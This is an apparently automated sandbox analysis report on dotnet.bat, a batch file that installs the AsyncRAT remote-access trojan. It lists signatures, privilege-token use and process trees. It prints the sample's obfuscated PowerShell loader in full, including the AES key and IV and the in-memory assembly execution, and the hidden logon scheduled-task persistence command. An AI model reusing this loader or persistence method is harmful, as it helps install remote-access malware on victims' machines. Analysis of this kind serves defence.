Malware Analysis Report

2024-10-19 06:56

Sample ID 240627-12dpwstdnh
Target dotnet.bat
SHA256 a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b
Tags
asyncrat winexplomg execution rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b

Threat Level: Known bad

The file dotnet.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat winexplomg execution rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-27 22:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-27 22:08

Reported

2024-06-27 22:09

Platform

win7-20240611-en

Max time kernel

34s

Max time network

19s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/1396-2-0x0000000074131000-0x0000000074132000-memory.dmp

memory/1396-3-0x0000000074130000-0x00000000746DB000-memory.dmp

memory/1396-4-0x0000000074130000-0x00000000746DB000-memory.dmp

memory/1396-5-0x0000000074130000-0x00000000746DB000-memory.dmp

memory/1396-6-0x0000000074130000-0x00000000746DB000-memory.dmp

memory/1396-7-0x0000000074130000-0x00000000746DB000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-27 22:08

Reported

2024-06-27 22:09

Platform

win10v2004-20240611-en

Max time kernel

39s

Max time network

39s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3676 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3676 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2932 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2932 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2932 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2932 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2932 wrote to memory of 1916 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 4824 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 4824 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 4824 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 3664 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 3664 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 3664 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 4912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 4912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 4912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4912 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4912 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4912 wrote to memory of 464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2932 wrote to memory of 3424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2932 wrote to memory of 3424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 464 wrote to memory of 4212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 4344 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dotnet')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network15166Man.cmd';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\timeout.exe

timeout /nobreak /t 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

